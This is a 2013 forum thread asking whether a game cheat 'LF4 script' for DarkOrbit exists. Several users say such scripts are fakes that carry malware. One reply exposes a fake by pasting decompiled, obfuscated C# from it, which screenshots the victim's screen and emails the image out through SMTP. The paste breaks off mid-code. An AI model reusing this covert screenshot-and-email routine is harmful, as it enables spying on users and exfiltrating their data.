LF4 Script

01/25/2013 23:53 YerAWizard#1
Is there any lf4 scripts? Like
01/25/2013 23:56 Technostar#2
no, they are fakes. i tried many but nothing worked, only my antivirus :p
01/25/2013 23:57 YerAWizard#3
Haha my antivirus worked too :D
01/26/2013 00:02 shooteram#4
Use your brain... Do you think it's possible ?
01/26/2013 00:11 gabrielcool1#5
Quote:
Originally Posted by shooteram View Post
Use your brain... Do you think it's possible ?
wow. 666 Post. LOL.. i have an image :handsdown: :mofo:
01/26/2013 00:12 Professional*#6
100% Possible someone have it but "PRIVATE"
01/26/2013 00:17 XxToXiiC-WaStEexX#7
Quote:
Originally Posted by Professional* View Post
100% Possible someone have it but "PRIVATE"
Hmm, let me fix this for you!
100% impossible and no one has it.

- XxToXiiC-WaStEexX
01/26/2013 00:24 Professional*#8
Quote:
Originally Posted by XxToXiiC-WaStEexX View Post
Hmm, let me fix this for you!
100% impossible and no one has it.

- XxToXiiC-WaStEexX
You don't know. 79 million peoples on DO and someone have it. But you don't know who.
Russians 96%
01/26/2013 00:42 Dakoti#9
No such thing as a "LF4 script"
01/26/2013 00:56 TheFallenAngel#10
Quote:
Hmm, let me fix this for you!
100% impossible and no one has it.

- XxToXiiC-WaStEexX
Quote:
You don't know. 79 million peoples on DO and someone have it. But you don't know who.
Russians 96%
there is such a script. it is in russian good guess. it is not public for obious reasons. i have seen it work. i do not have it myself. i know Russians who do have it. but they keep it very secret for obvious reasons.
01/26/2013 01:15 YerAWizard#11
Quote:
Originally Posted by TheFallenAngel View Post
there is such a script. it is in russian good guess. it is not public for obious reasons. i have seen it work. i do not have it myself. i know Russians who do have it. but they keep it very secret for obvious reasons.
Nice but how you have seen it, but you don't have it ^^
01/26/2013 01:29 TheFallenAngel#12
i have had it used on my account to get me LF4. but i was only able to watch via teamviewer. as they would not send it to me.
01/26/2013 01:45 reda87#13
date of creation 17/3/2012

[Only registered and activated users can see links. Click Here To Register...]
01/26/2013 02:35 SeanyLad™#14
Fake...

public static string SendEmail(ref string SMTP, ref string Froma, ref string Password, ref string Recipient, ref string Subject, ref string Body, ref int Port, ref bool TakePic = false)
{
string str;
try
{
MailMessage message = new MailMessage {
From = new MailAddress(Froma)
};
message.To.Add(Recipient);
message.Subject = Subject;
message.Body = Body;
message.IsBodyHtml = ςιΝΕσςΙ;
SmtpClient client = new SmtpClient(SMTP);
string str2 = @"\" + LT;
if (TakePic)
{
using (Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height))
{
using (Graphics graphics = Graphics.FromImage(bitmap))
{
graphics.CopyFromScreen(0, 0, 0, 0, Screen.PrimaryScreen.Bounds.Size);
bitmap.Save(Path.GetTempPath() + str2 + ".gif", ImageFormat.Gif);
}
}
Attachment item = new Attachment(Path.GetTempPath() + str2 + ".gif");
message.Attachments.Add(item);
}
client.Port = Port;
client.EnableSsl = true;
client.Credentials = new NetworkCredential(Froma, Password);
client.Send(message);
if (κωρυΖξυβ)
{
File.Delete(Path.GetTempPath() + str2 + ".gif");
}
str = "Email information is valid and working!";
}
catch (Exception exception1)

01/26/2013 03:00 linksus#15
Quote:
Originally Posted by Professional* View Post
You don't know. 79 million peoples on DO and someone have it. But you don't know who.
Russians 96%
Go away, you have nothing of "know how".
Even the russians don't have it. They do a lot, but not this...

LF4/DMG-scripts or bugs don't exist, only once the lvl 24 ACP Irise... :facepalm:


#reported